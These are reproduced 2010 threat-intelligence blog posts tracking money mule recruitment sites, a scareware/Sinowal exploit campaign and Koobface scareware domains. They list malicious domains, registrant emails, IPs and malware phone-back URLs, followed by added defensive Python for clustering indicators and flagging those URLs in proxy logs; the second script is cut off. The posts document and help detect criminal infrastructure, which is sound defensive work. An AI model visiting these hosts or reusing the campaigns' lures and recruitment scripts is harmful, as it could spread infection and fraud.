From a cybercriminal's perspective, such minor operational glitches don't undermine the business model. Sadly, it's more cost-effective to build a new botnet than to try to regain access to the old one. What truly undermines their business model is their inability to utilize the monetization vector. 



AS50215 TROYAK-AS Starchenko Roman Fedorovich activity during Q1, 2010: 

[8] Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware 

[9] Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams 

[10] PhotoArchive Crimeware/Client-Side Exploits Serving 
Campaign in the Wild 

[11] Tax Report Themed Zeus/Client-Side Exploits Serving 
Campaign in the Wild 

[12] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

This post has been reproduced from [13]Dancho Danchev's 
blog. Follow him [14]on Twitter. 
5. http://cidr-report.org/cgi-bin/as-report?as=AS50215 

6. http://www.abuse.ch/?p=2417 

7. https://zeustracker.abuse.ch/monitor.php?filter=online 

8. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html 

9. http://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.html 

10. http://ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.html 

11. http://ddanchev.blogspot.com/2010/02/tax-report-themed-zeusclient-side.html 

12. http://ddanchev.blogspot.com/2010/02/keeping-money-mule-recruiters-on-short.html 

13. http://ddanchev.blogspot.com/ 

14. http://twitter.com/danchodanchev 
Money Mule Recruiters on Yahoo!'s Web Hosting (2010-03-11 20:41) 

UPDATED: Saturday, March 13, 2010 - Yahoo! Web Hosting abuse just pinged me that "We have investigated the sites and taken the necessary action". 

Just how dumb, or perhaps ingenious, is a cybercriminal who would host his money mule recruitment operations using Yahoo!'s Web Hosting services? Is the reputable hosting location worth the risk of having their campaigns taken down much more easily than if they were hosted on a bad-reputation block whose operators would never have bothered replying to abuse notifications? 

Whatever the motivation of the people behind this money mule recruitment campaign, they are currently using Yahoo! Web Hosting. Domains in question, including contact details: 
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- Reed Financial Services - reed-fs.com - 68.180.151.74 
555 11th St NW 

Washington, DC 20004 
Phone numbers: 

(866) 863-6438 
(202) 355-6678 (FAX) 
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- Stevens Financial Solutions - stevensfs.com - 
98.136.50.138; 69.147.83.187; 69.147.83.188 

Postal address: 

Stevens Financial Solutions 

Bahnhofstrasse 32 

CH-8001 Zurich, Switzerland 

Value Added Tax Nr.: 428 643 

Phones and fax no's: 


Phone: +41 (43) 219-2551 


Fax 1: +41 (43) 219-2551 

Fax 2: +1 (866) 703-7622 US Toll-Free 

- Waters & Co. LLP - watersllp.com - 216.39.57.104 
400 East Pratt Street, 

Baltimore, MD 21202 
United States 
Phone numbers: 

(443) 524-9221 
(443) 524-9221 (FAX) 
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- Nilson Financial Solutions - nilson-fs.com - 98.136.92.76; 
98.136.92.77; 98.136.92.78 

Nilson Financial Solutions 

Bahnhofstrasse 32 

CH-8001 Zurich, Switzerland 

Value Added Tax Nr.: 428 643 

Phones and fax no's: 

Phone: +41 (43) 219-2551 

Fax 1: +41 (43) 219-2551 


Fax 2: +1 (866) 472-0560 US Toll-Free 

Upon submitting the personal details, the potential money 
mule is required to send a scanned copy of their 

ID or driving license: 

• "Familiarize yourself with all clauses of the contract. Fill the contract and send us a scanned copy of it to the email address info@watersllp.com or by fax: (443) 524-9221. The contract becomes valid from the moment of the reception of the correctly filled copy of the contract. You should be familiar with that the validity of the contract in the electronic form is completely identical to the contract signed at personal presence of both parties.* To pass the procedure of identity verification in order to prevent fraudulent registrations, you are required to send a scan of valid ID or a driving license to the e-mail: info@watersllp.com or by fax: (443) 524-9221. We guarantee full confidentiality of your personal information, more information on this matter you will find in our Privacy Policy. PLEASE LET US KNOW BY EMAIL WHEN YOU WILL FAX BACK/EMAIL AS ATTACHMENT THE CONTRACT AND APPLICATION FORM WITHIN 48 HOURS." 
Yahoo!'s Web Hosting abuse team has been notified of the campaigns, and will nuke them offline a.s.a.p. 

Related coverage of money laundering in the context 
of cybercrime: 


[ 1 ]Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[2] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[3] Keeping Reshipping Mule Recruiters on a Short Leash 

[4] Keeping Money Mule Recruiters on a Short Leash 

[5] Standardizing the Money Mule Recruitment Process 

[6] Inside a Money Laundering Group's Spamming Operations 

[7] Money Mule Recruiters use ASProx's Fast Fluxing Services 

[8] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [9]Dancho Danchev's 
blog. Follow him [10]on Twitter. 
Scareware, Sinowal, Client-Side Exploits Serving Spam Campaign in the Wild (2010-03-13 00:17) 

AS50215 Troyak-as customers are back, with an ugly mix of scareware, Sinowal and client-side exploits serving campaign using the "You don't have the latest version of Macromedia Flash Player" theme. Quality assurance is also in place this time, with the client-side exploit serving domains using a well known "[1]function nerot" obfuscation technique in an attempt to bypass link scanners. 

Let's dissect the campaign, list all the typosquatted and spamvertised domains, the client-side exploit serving iFrames and the actual scareware. 

Sampled URLs: archives.wesh.kr/archive0715/?id=test@test.com; anonymousfiles.wesh.or.kr/archive0715/?id=test@test.com. 
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Spamvertised and typosquatted currently active domains 
include: 

enyg.ne.kr - Email: EneesC9563@hotmail.com 
enyk.ne.kr - Email: EneesC9563@hotmail.com 
enyz.ne.kr - Email: EneesC9563@hotmail.com 
enyg.kr - Email: EneesC9563@hotmail.com 
enyk.kr - Email: EneesC9563@hotmail.com 
enyg.co.kr - Email: EneesC9563@hotmail.com 
enyk.co.kr - Email: EneesC9563@hotmail.com 
enyt.co.kr - Email: EneesC9563@hotmail.com 
enyz.co.kr - Email: EneesC9563@hotmail.com 
enyg.or.kr - Email: EneesC9563@hotmail.com 
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enyk.or.kr - Email: EneesC9563@hotmail.com 
enyt.or.kr - Email: EneesC9563@hotmail.com 
enyz.or.kr - Email: EneesC9563@hotmail.com 
enyt.kr - Email: EneesC9563@hotmail.com 


enyz.kr - Email: EneesC9563@hotmail.com 
erase.co.kr - Email: PalacidoL6860@hotmail.com 
erase.ne.kr - Email: PalacidoL6860@hotmail.com 
erase.or.kr - Email: PalacidoL6860@hotmail.com 
erasm.co.kr - Email: PalacidoL6860@hotmail.com 
erasm.kr - Email: PalacidoL6860@hotmail.com 
erasm.ne.kr - Email: PalacidoL6860@hotmail.com 
erasm.or.kr - Email: PalacidoL6860@hotmail.com 
erasv.co.kr - Email: PalacidoL6860@hotmail.com 
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erasv.kr - Email: PalacidoL6860@hotmail.com 
erasv.ne.kr - Email: PalacidoL6860@hotmail.com 
erasv.or.kr - Email: PalacidoL6860@hotmail.com 
erasw.co.kr - Email: PalacidoL6860@hotmail.com 
erasw.kr - Email: PalacidoL6860@hotmail.com 
erasw.ne.kr - Email: PalacidoL6860@hotmail.com 
erasw.or.kr - Email: PalacidoL6860@hotmail.com 
wesc.ne.kr - Email: PalacidoL6860@hotmail.com 
wese.co.kr - Email: PalacidoL6860@hotmail.com 
wese.kr - Email: PalacidoL6860@hotmail.com 



wese.or.kr - Email: PalacidoL6860@hotmail.com 
wesh.co.kr - Email: PalacidoL6860@hotmail.com 
wesh.kr - Email: PalacidoL6860@hotmail.com 
wesh.or.kr - Email: PalacidoL6860@hotmail.com 
wesi.co.kr - Email: PalacidoL6860@hotmail.com 
wesi.kr - Email: PalacidoL6860@hotmail.com 
wesi.or.kr - Email: PalacidoL6860@hotmail.com 
wesw.co.kr - Email: PalacidoL6860@hotmail.com 
wesw.kr - Email: PalacidoL6860@hotmail.com 
wesw.ne.kr - Email: PalacidoL6860@hotmail.com 
wesw.or.kr - Email: PalacidoL6860@hotmail.com 
Name servers of notice: 

ns1.hr-skc.com - 74.117.63.218 - Email: hr@skrealty.net 
ns1.welcomhell.com - 74.117.63.218 - Email: klincz@aol.com 
ns1.skcstaff.com - 87.117.245.9 - Email: staffing@skhomes.com 
ns1.limeteablack.net - 87.117.245.9 - Email: doofi@usa.com 

Upon visiting the spamvertised links, the cybercriminals are then enticing the user into manually downloading update.exe - [2]Trojan:Win32/Alureon.DA; Mal/FakeAV-CS - Result: 10/42 (23.81 %). 

The sample phones back to the following locations, downloading the actual scareware (setup.exe - [3]Mal/FakeAV-CS; FakeAlert-FQ - Result: 9/41 (21.96 %)) and ensuring that the cybercriminals receive the phone-back with the affiliate ID to confirm a successful installation: 

- gotsaved.cn/css/_void/crcmds/main - 91.212.132.7 - Email: georgelem@xhotmail.net 
gotsaved.cn/css/_void/srcr.dat 
gotsaved.cn/css/_void/crcmds/install 
gotsaved.cn/css/_void/crfiles/serf 
gotsaved.cn/css/_void/crcmds/builds/bbr 
gotsaved.cn/css/_void/crfiles/bbr 
gotsaved.cn/css/_void/knock.php 
gotsaved.cn/css/_void/crcmds/extra 

- automaticallyfind.org/?gd=KCo7MD8uPS4iPA==&affid=XF5W&subid=AQoY&prov=&mode=cr&v=6&newref=1 - 69.39.238.101 - Email: larrypenn@xhotmail.net 
automaticallyfind.org/?gd=KCo7MD8uPS4iPA==&affid=Wg==&subid=GwocGwEEHQ==&prov=&mode=cr&v=6nkr 

- beinahet.com/readdatagateway.php?type=stats&affid=319&subid=new&version=3.0&adwareok - 193.169.234.30 - Email: Vrapus.Kamat@gmail.com 

- mega-fast.org/page2/setup - 91.212.132.8 - Email: Vrapus.Kamat@gmail.com 
mega-fast.org/page2/setup0 

Parked on 91.212.132.5, 91.212.132.7, 91.212.132.8 (gotsaved.cn) are also: 

airportweb.cn - Email: JoannaWilhelm@xhotmail.net 
gotsaved.cn - Email: georgelem@xhotmail.net 
gotsick.cn - Email: georgelem@xhotmail.net 
gottired.cn - Email: georgelem@xhotmail.net 
gotunderway.cn - Email: georgelem@xhotmail.net 


gotupset.com - Email: DianaFister@xhotmail.net 
methodsweb.com - Email: bryantlew@xhotmail.net 
pickingweb.cn - Email: JoannaWilhelm@xhotmail.net 
prima-fast.org - Email: Vrapus.Kamat@gmail.com 
publishingweb.cn - Email: JoannaWilhelm@xhotmail.net 
quickfreescan.org - Email: GrantPursell@xhotmail.net 
scanerborn.cn - Email: KristinDunton@xhotmail.net 
scanerexcuse.cn - Email: KristinDunton@xhotmail.net 
scanernurse.cn - Email: KristinDunton@xhotmail.net 
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scanerwhatever.cn - Email: KristinDunton@xhotmail.net 

senateweb.com - Email: bryantlew@xhotmail.net 

webdocuments.cn - Email: JoannaWilhelm@xhotmail.net 

Parked on 69.39.238.101 (automaticallyfind.org) are also 

guysfind.org - Email: larrypenn@xhotmail.net 

automaticallyfind.org - Email: larrypenn@xhotmail.net 

findalternate.org - Email: larrypenn@xhotmail.net 

As we've already seen in previous campaigns, each and every domain is embedded with an iFrame, which this time behaves differently, much more covertly than the one used before. ylwgheakrozn.com/ld/novl/ - 66.135.37.211 - Email: getilakll@yahoo.com would attempt to load the following: 

- ylwgheakrozn.com /nte/novl.php 

- ylwgheakrozn.com /nte/avorplnovl.py 

- ylwgheakrozn.com /nte/NOVl.py 

• The folks at FireEye have covered the "[4]function nerot" in depth in January, 2010, and have analyzed a campaign using a similar structure as the current one 

But would also attempt to load the nonexistent: 

- ylwgheakrozn.com /nte/AVORPlNOVl.exe 
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- ylwgheakrozn.com /nte/NOVl.exe 

- ylwgheakrozn.com /nte/NOVl.asp 

- ylwgheakrozn.com /nte/NOVl.html 

The campaign ultimately serves [5]Backdoor.Sinowal.DJ; 
Result: 

15/42 (35.71 %) through an obfuscated 

[6]Exploit.PDF-JS.Gen - Result: 18/42 (42.86 %). 

Parked on the same IPs as the iFrame domain is the remaining portfolio of domains, presumably prepared for rotation; in fact, some of them are already involved in malicious activity. 

At 69.174.245.148; 75.125.212.58; 66.135.37.211; 190.120.228.44 and 76.74.238.94 is the rest of the client-side exploits serving domains portfolio: 

aabtiktadve.com - Email: adminhhhPolego@hotmail.com 
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acdcwpbathr.com - Email: vikolr5ty@yahoo.com 
acdlsvladve.com - Email: ade45Meehan4@yahoo.com 
aghgiqfathr.com - Email: eeeDalmanbei@yahoo.com 
balhimana.com - Email: Malachowski@yahoo.com 
dbcavsaddve.com - Email: Wilfredo-admin@yahoo.com 
ddehkyhddve.com - Email: admnBowgrenfd@yahoo.com 
ddewphwddve.com - Email: W-Leet1210@yahoo.com 
dhjgjwgddve.com - Email: adminSeaborn09@yahoo.com 
dhjvnvvddve.com - Email: adminSeaborn09@yahoo.com 
diaiscjdthr.com - Email: Nelsondwer4@yahoo.com 
ejsinlbyidid.com - Email: nerForbes09@yahoo.com 
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fgdchevuno.net - Email: 22232344sad22blyj@msanz.com 


fgnmgojuno.com - Email: 2223234422awbyj@msanz.com 

fgxwuyyuno.com - Email: 2223234422asdbyj@msanz.com 

ghedifauno.com - Email: 2223234422asdlbyj@msanz.com 

ghtsuumuno.com - Email: 
222323442qwle2byj@msanz.com 

hdewptwhdve.com - Email: zekoAdmin@yahoo.com 

hhjvnzvhdve.com - Email: qwMeier34ed@hotmail.com 

jcdcwxbjthr.com - Email: kovin78213@yahoo.com 

jefshosjdve.com - Email: Computer66Heads@yahoo.com 

kbclyokkthr.com - Email: admHalliday666@yahoo.com 

kdvarmgibtp.com - Email: aatrganz10@yahoo.com 

lbckqbkldve.com - Email: W-Leet1210@yahoo.com 

mcdcwjbmthr.com - Email: Lobertzqeq437@yahoo.com 

mghvegumthr.com - Email: eeeDalmanbei@yahoo.com 

mjisuvrmthr.com - Email: domainHodge2@hotmail.com 
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pdecaxcpdve.com - Email: Computer66Heads@yahoo.com 
pfgeeeepdve.com - Email: admndomsale12@yahoo.com 
pfgfgdepthr.com - Email: finsky777admin@gmail.com 


pfgoykopdve.com - Email: Wildeysgh67@yahoo.com 
pfgtihtpdve.com - Email: admnBowgrenfd@yahoo.com 
pianwinpdve.com - Email: Wilfredo-admin@yahoo.com 
qabaqbyqthr.com - Email: admHalliday666@yahoo.com 
qabtihtqdve.com - Email: Lawrencee45sd@yahoo.com 
qcdvnhvqdve.com - Email: Lawrencee45sd@yahoo.com 
qefshvsqdve.com - Email: Wildeysgh67@yahoo.com 
qghgixfqthr.com - Email: Nguyen10@gmail.com 
qghkqfkqdve.com - Email: adminsales@yahoo.com 
qghpbapqdve.com - Email: qwMeier34ed@hotmail.com 
qghvexuqthr.com - Email: Richmondsw3d@yahoo.com 
qhjcwfbqthr.com - Email: asVeles45@hotmail.com 
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qlpkoxmdzxsb.com - Email: 
QLPKOXMDZXSB.COM@domainservice.com 

sjidamcsthr.com - Email: Gallippihu67@yahoo.com 

sjinfcmsthr.com - Email: 
domainadmin@navigationcatalyst.com 

tbcpbxptdve.com - Email: hoters12admin@yahoo.com 

tfgoyqotdve.com - Email: Brodeursdfrtr@yahoo.com 

thjgjcgtdve.com - Email: Harrisasasd@yahoo.com 



tiashostdve.com - Email: aaLehmann34s@yahoo.com 

ubcvesuuthr.com - Email: kovin78213@yahoo.com 

uefxrwxudve.com - Email: admndomsale12@yahoo.com 

wghgiwfwthr.com - Email: Richmondsw3d@yahoo.com 

yvbbpgrixovr.com - Email: dioSingh12@yahoo.com 

Monitoring of the campaign is ongoing, updates will be 
posted as soon as new developments emerge. 
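Every list in these posts pairs a domain with its registrant email and, where known, its hosting IP, and the connections drawn in the text (one qq.com address behind most of the poker spam domains, two name servers sharing 74.117.63.218, the gotsaved.cn portfolio on 91.212.132.x) are made by eye. The Python below is an added example and not code from the post: it parses lines in the exact "domain - IP - Email: address" shape used on this page, pivots on registrant email and on IP, and then runs a union-find over hosts, emails and IPs so that infrastructure joined through either attribute lands in one cluster. The SAMPLE_LINES are copied from the lists in the poker post and this one (the gotsaved.cn path as cleaned above); nothing else is assumed.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Lines copied from the domain lists on this page; this is the format the posts use.
SAMPLE_LINES = """
bonuscasinoslux.net - Email: fgsdvbbvd@qq.com
bonusgameslux.net - Email: fgsdvbbvd@qq.com
gorxshop.net - Email: sdfxckj@msn.com
lutiok.net - Email: ftgy23fge@126.com
luxclubcasinos.net - Email: fgsdvbbvd@qq.com
ns1.hr-skc.com - 74.117.63.218 - Email: hr@skrealty.net
ns1.welcomhell.com - 74.117.63.218 - Email: klincz@aol.com
ns1.skcstaff.com - 87.117.245.9 - Email: staffing@skhomes.com
- gotsaved.cn/css/_void/crcmds/main - 91.212.132.7 - Email: georgelem@xhotmail.net
gotsick.cn - Email: georgelem@xhotmail.net
gottired.cn - Email: georgelem@xhotmail.net
"""

# "host[/path] [- IP] - [Email:] address"; the Email: label is optional because
# a few lines on the page omit it.
LINE_RE = re.compile(
    r"^(?P<host>[\w.-]+)(?:/\S*)?"                         # domain, optional path
    r"(?:\s+-\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}))?"         # optional hosting IP
    r"\s+-\s+(?:Email:?\s*)?(?P<email>[^\s@]+@[^\s@]+)\s*$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Indicator:
    host: str
    ip: Optional[str]
    email: str


def parse_indicator_lines(text):
    """Turn the post's 'domain - IP - Email:' lines into Indicator records."""
    out = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("-").strip()   # some lines carry a leading "- "
        if not line:
            continue
        m = LINE_RE.match(line)
        if m:
            out.append(Indicator(m.group("host").lower(), m.group("ip"),
                                 m.group("email").lower()))
    return out


def pivot(indicators, key):
    """Map each distinct value of `key` ('email' or 'ip') to the hosts sharing it."""
    groups = defaultdict(set)
    for ind in indicators:
        value = getattr(ind, key)
        if value:
            groups[value].add(ind.host)
    return {k: sorted(v) for k, v in groups.items()}


def shared_infrastructure(indicators, min_hosts=2):
    """Emails and IPs that tie together at least `min_hosts` distinct hosts."""
    return {
        key: {k: v for k, v in pivot(indicators, key).items() if len(v) >= min_hosts}
        for key in ("email", "ip")
    }


def infrastructure_clusters(indicators):
    """Connected components over host, email and IP nodes (union-find).

    Two hosts with different registrants but the same IP end up in one cluster,
    as do two IPs that share a registrant; that is the pivot the posts do by hand.
    """
    parent = {}

    def find(x):
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]   # path halving
            x = parent[x]
        return x

    def union(a, b):
        ra, rb = find(a), find(b)
        if ra != rb:
            parent[ra] = rb

    for ind in indicators:
        host = "host:" + ind.host
        union(host, "email:" + ind.email)
        if ind.ip:
            union(host, "ip:" + ind.ip)
    clusters = defaultdict(set)
    for node in list(parent):
        clusters[find(node)].add(node)
    return sorted((sorted(c) for c in clusters.values()), key=len, reverse=True)


if __name__ == "__main__":
    inds = parse_indicator_lines(SAMPLE_LINES)
    print(shared_infrastructure(inds))
    for cluster in infrastructure_clusters(inds):
        print(cluster)
```

The email pivot alone would keep ns1.hr-skc.com and ns1.welcomhell.com apart (different registrants); the cluster view joins them through the shared 74.117.63.218, which is the connection the post draws.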

Related Troyak-as activity and previous campaigns 
maintained by their customers: 

[7] AS50215 Troyak-as Taken Offline, Zeus C &Cs Drop from 
249 to 181 

[8] Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware 

[9] Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams 

[10] PhotoArchive Crimeware/Client-Side Exploits Serving 
Campaign in the Wild 

[11] Tax Report Themed Zeus/Client-Side Exploits Serving 
Campaign in the Wild 

[12] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

This post has been reproduced from [13]Dancho Danchev's 
blog. Follow him [14]on Twitter. 



1. http://blog.fireeye.com/research/2010/01/pdf-obfuscation.html 

2. http://www.virustotal.com/analisis/13deb97feb24884914143139fe173f1eefe63c6b1b40d95b48c835455e1810af-1268411432 

3. http://www.virustotal.com/analisis/0fa30043f45fe0e9f7fd64b1e9440b8ea7eca8431b73388f1184c3ee83b2335a-1268423943 

4. http://blog.fireeye.com/research/2010/01/pdf-obfuscation.html 

5. http://www.virustotal.com/analisis/78df316892ec75fb2d17b9a589aed980771bcc6349325f02f1007b21e7d850ba-1268419059 

6. http://www.virustotal.com/analisis/db46413231ea9bed8f4d8b40bc820ae7015ac9e6226c9ffe996fef975128b511-1268433015 

7. http://ddanchev.blogspot.com/2010/03/as50215-troyak-as-taken-offline-zeus-c.html 

8. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html 

9. http://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.html 

10. http://ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.html 

11. http://ddanchev.blogspot.com/2010/02/tax-report-themed-zeusclient-side.html 

12. http://ddanchev.blogspot.com/2010/02/keeping-money-mule-recruiters-on-short.html 

13. http://ddanchev.blogspot.com/ 

14. http://twitter.com/danchodanchev 
Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova (2010-03-15 13:51) 

Just how greedy has the Koobface gang become these days? Very greedy. 

In fact, their currently active scareware campaigns operate with a changed directory structure that speaks for itself - scareware-domain/feel/index.php?GREED==random_characters. Let's dissect the scareware monetization vector, expose the entire typosquatted domains portfolio, and offer a historical OSINT perspective on their activities during February, 2010. 

• The domain portfolios are in the process of being suspended 

The current portfolio of redirectors embedded on Koobface- 
infected hosts is parked at 195.5.161.129, AS43558, 

EVENTISMOBILE-AS IM "Eventis-Mobile" SRL Chisinau, 
Republic of Moldova: 

tvinyourpc.com - Email: test@now.net.cn 
wheretosellford.com - Email: test@now.net.cn 
weddings-sales-place.com - Email: test@now.net.cn 
chromepluginsfree.com - Email: test@now.net.cn 
checkwebtriple.com - Email: test@now.net.cn 
partypartytime.com - Email: test@now.net.cn 
yourblog2blog.com - Email: test@now.net.cn 
microstoreblog.com - Email: test@now.net.cn 
mexicomaxtravel.com - Email: info@montever.de 
fulllife2photo.com - Email: test@now.net.cn 
yourmaximumphoto.com - Email: test@now.net.cn 
lineagecheatandbug.com - Email: test@now.net.cn 
titansandgods.com - Email: test@now.net.cn 
microsoftbugtracks.com - Email: test@now.net.cn 
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secureyourinfos.com - Email: test@now.net.cn 
weddingiephotos.com - Email: test@now.net.cn 
parkeroffers.com - Email: test@now.net.cn 
nocderrors.com - Email: test@now.net.cn 

androidmobilereviews.com - Email: test@now.net.cn 
terraanews.com - Email: test@now.net.cn 
getbestshows.com - Email: test@now.net.cn 
videostvshows.com - Email: test@now.net.cn 
besttvshowininternet.com - Email: test@now.net.cn 
titanicoverlight.com - Email: test@now.net.cn 
The scareware domains portfolio is currently parked on 195.5.161.117, AS43558, EVENTISMOBILE-AS IM "Eventis-Mobile" SRL Chisinau, Republic of Moldova: 

be-protected-lO.info - Email: harkitrip@ymail.com 

be-protecteda.info - Email: harkitrip@ymail.com 

be-protectedc.info - Email: harkitrip@ymail.com 

be-protectedi.info - Email: harkitrip@ymail.com 

be-protected-i8.info - Email: harkitrip@ymail.com 


be-protectedk.info - Email: harkitrip@ymail.com 

be-protected-IO.info - Email: harkitrip@ymail.com 

be-protected-ll.info - Email: harkitrip@ymail.com 

be-protected-tl.info - Email: harkitrip@ymail.com 

be-protectedy.info - Email: harkitrip@ymail.com 

be-secured-al.info - Email: harkitrip@ymail.com 

be-secured-b2.info - Email: harkitrip@ymail.com 

be-secured-c6.info - Email: harkitrip@ymail.com 

be-secured-d9.info - Email: harkitrip@ymail.com 

be-secured-zl.info - Email: harkitrip@ymail.com 

capital-security1.info - Email: goninanbiz2@ymail.com 

capital-security2.info - Email: goninanbiz2@ymail.com 

capital-security6.info - Email: goninanbiz2@ymail.com 

capital-securitya.info - Email: goninanbiz2@ymail.com 

capital-securityc.info - Email: goninanbiz2@ymail.com 

capital-securitye.info - Email: goninanbiz2@ymail.com 

capital-securityt.info - Email: goninanbiz2@ymail.com 

general-protection0.info - Email: goninanbiz2@ymail.com 

general-protectionl.info - Email: 
goninanbiz2@ymail.com 
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general-protection4.info - Email: 
goninanbiz2@ymail.com 

general-protection9.info - Email: 
goninanbiz2@ymail.com 

how-to-secure-pc1.info - kramershoppers@yahoo.com 

help-you-now0.info - Email: intrigo2@yahoo.com 

help-you-now1.info - Email: intrigo2@yahoo.com 

help-you-now4.info - Email: intrigo2@yahoo.com 

help-you-now6.info - Email: intrigo2@yahoo.com 

help-you-now9.info - Email: intrigo2@yahoo.com 

• Consider going through "[1]The ultimate guide to scareware protection" and a [2]gallery of popular scareware/fake security software brands 

pchelpserver.info - Email: vernotowersc2@googlemail.com 

pchelpservera.info - Email: 
vernotowersc2@googlemail.com 

pchelpserverz.info - Email: 
vernotowersc2@googlemail.com 

powersecurity09.info - Email: miscelli3@googlemail.com 
powersecurityc.info - Email: miscelli3@googlemail.com 
powersecurityt.info - Email: miscelli3@googlemail.com 


powersecurityy.info - Email: miscelli3@googlemail.com 
powerssoftware0.info - Email: miscelli3@googlemail.com 
powerssoftware1.info - Email: miscelli3@googlemail.com 
powerssoftware3.info - Email: miscelli3@googlemail.com 
powerssoftware6.info - Email: miscelli3@googlemail.com 
security-softwarec.info - kramershoppers@yahoo.com 
software-helpa.info - Email: hartin6@yahoo.com 
software-helpd.info - Email: hartin6@yahoo.com 
software-helpe.info - Email: hartin6@yahoo.com 
software-helpy.info - Email: hartin6@yahoo.com 
software-helpz.info - Email: hartin6@yahoo.com 
special-software1.info - Email: hartin6@yahoo.com 
special-software3.info - Email: hartin6@yahoo.com 
special-software7.info - Email: hartin6@yahoo.com 
special-software8.info - Email: hartin6@yahoo.com 
special-software9.info - Email: hartin6@yahoo.com 
specialwebhelp0.info - Email: hartin6@yahoo.com 
specialwebhelp1.info - Email: hartin6@yahoo.com 
specialwebhelp3.info - Email: hartin6@yahoo.com 
specialwebhelp5.info - Email: hartin6@yahoo.com 



specialwebhelp7.info - Email: hartin6@yahoo.com 
Detection rates for scareware samples rotated over the past 48 hours: 

- Setup_312s2.exe - [3]Trojan.Win32.FakeAV!IK - Result: 4/41 (9.76 %) 
- Setup_312s2.exe - [4]Trojan.Generic.KD.3549 - Result: 4/41 (9.76 %) 
- Setup_312s2.exe - [5]Trojan.Generic.KD.3605 - Result: 10/42 (23.81 %) 
- Setup_312s2.exe - [6]Packed.Win32.Krap.as - Result: 6/41 (14.64 %) 
- Setup_312s2.exe - [7]Trojan.Crypt.XPACK.Gen2 - Result: 6/42 (14.29 %) 
- Setup_312s2.exe - [8]Sus/UnkPack-C - Result: 10/42 (23.81 %) 

The samples phone back to projectwupdates.com/download/winlogo.bmp - 94.228.208.57 and cari-port.com/?b=312s2 - 89.248.168.21 (psdefendersoft.com and antispywarelist.com also 
parked there) - Email: zooik52@hotmail.com. 
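The phone-back and landing URLs documented on this page have recognisable shapes: the scareware affiliate check-ins with both an affid and a subid parameter and the gotsaved.cn/css/_void/knock.php and crcmds/install calls from the Sinowal campaign post above, and the /feel/index.php?GREED== directory structure and the cari-port.com / projectwupdates.com phone-backs from this post. The Python below is an added example and not code from either post: it runs four rules (affiliate check-in, Koobface GREED landing, _void phone-back, known-host match) over proxy log lines and then reports clients that tripped more than one rule, which is the installer-then-check-in chain the posts describe. The log lines, the client addresses and the benign control hosts (intranet.example, www.example.com) are constructed; the malicious hosts and URL shapes are taken from the posts.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Hosts the posts name as scareware phone-back or affiliate check-in locations.
KNOWN_HOSTS = {
    "automaticallyfind.org", "beinahet.com", "gotsaved.cn", "mega-fast.org",
    "cari-port.com", "projectwupdates.com",
}

# Constructed proxy log lines: epoch, client, method, URL. The URL shapes on the
# malicious hosts are those documented in the posts; the *.example entries are
# benign controls (an affid without a subid must not fire).
LOG_LINES = [
    "1268400001 10.0.0.12 GET http://automaticallyfind.org/?gd=KCo7MD8uPS4iPA==&affid=XF5W&subid=AQoY&prov=&mode=cr&v=6&newref=1",
    "1268400002 10.0.0.12 GET http://beinahet.com/readdatagateway.php?type=stats&affid=319&subid=new&version=3.0&adwareok",
    "1268400003 10.0.0.12 GET http://gotsaved.cn/css/_void/knock.php",
    "1268400004 10.0.0.12 GET http://gotsaved.cn/css/_void/crcmds/install",
    "1268400005 10.0.0.44 GET http://be-protecteda.info/feel/index.php?GREED==k3jd9sa",
    "1268400006 10.0.0.44 GET http://cari-port.com/?b=312s2",
    "1268400007 10.0.0.99 GET http://intranet.example/stats.php?type=stats&affid=7",
    "1268400008 10.0.0.99 GET http://www.example.com/index.php?id=1",
]

LOG_RE = re.compile(r"^(?P<ts>\d+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)$")
VOID_PATH_RE = re.compile(r"/_void/(?:knock\.php|crcmds/install)$")


def classify_url(url):
    """Return a list of (rule, details) for every rule the URL matches."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = []
    # Scareware affiliate check-in: an affiliate ID and a sub-affiliate ID together.
    if "affid" in query and "subid" in query:
        hits.append(("affiliate_checkin",
                     {"affid": query["affid"][0], "subid": query["subid"][0]}))
    # Koobface scareware landing page: /feel/index.php?GREED==<random>
    if parts.path.endswith("/feel/index.php") and parts.query.startswith("GREED="):
        hits.append(("koobface_greed",
                     {"token": parts.query[len("GREED="):].lstrip("=")}))
    # Installer phone-back paths under /_void/ (knock.php, crcmds/install).
    if VOID_PATH_RE.search(parts.path):
        hits.append(("void_checkin", {"path": parts.path}))
    # Plain indicator match against hosts named in the posts.
    if host in KNOWN_HOSTS:
        hits.append(("ioc_host", {"host": host}))
    return hits


def scan(lines):
    """Run classify_url over proxy log lines and flatten the hits into alerts."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for rule, details in classify_url(m.group("url")):
            alerts.append({"ts": int(m.group("ts")), "client": m.group("client"),
                           "rule": rule, **details})
    return alerts


def chained_clients(alerts, min_rules=2):
    """Clients that triggered at least `min_rules` distinct rules: an installer
    phone-back followed by an affiliate check-in is the chain the posts describe."""
    rules_by_client = {}
    for a in alerts:
        rules_by_client.setdefault(a["client"], set()).add(a["rule"])
    return sorted(c for c, rules in rules_by_client.items() if len(rules) >= min_rules)


if __name__ == "__main__":
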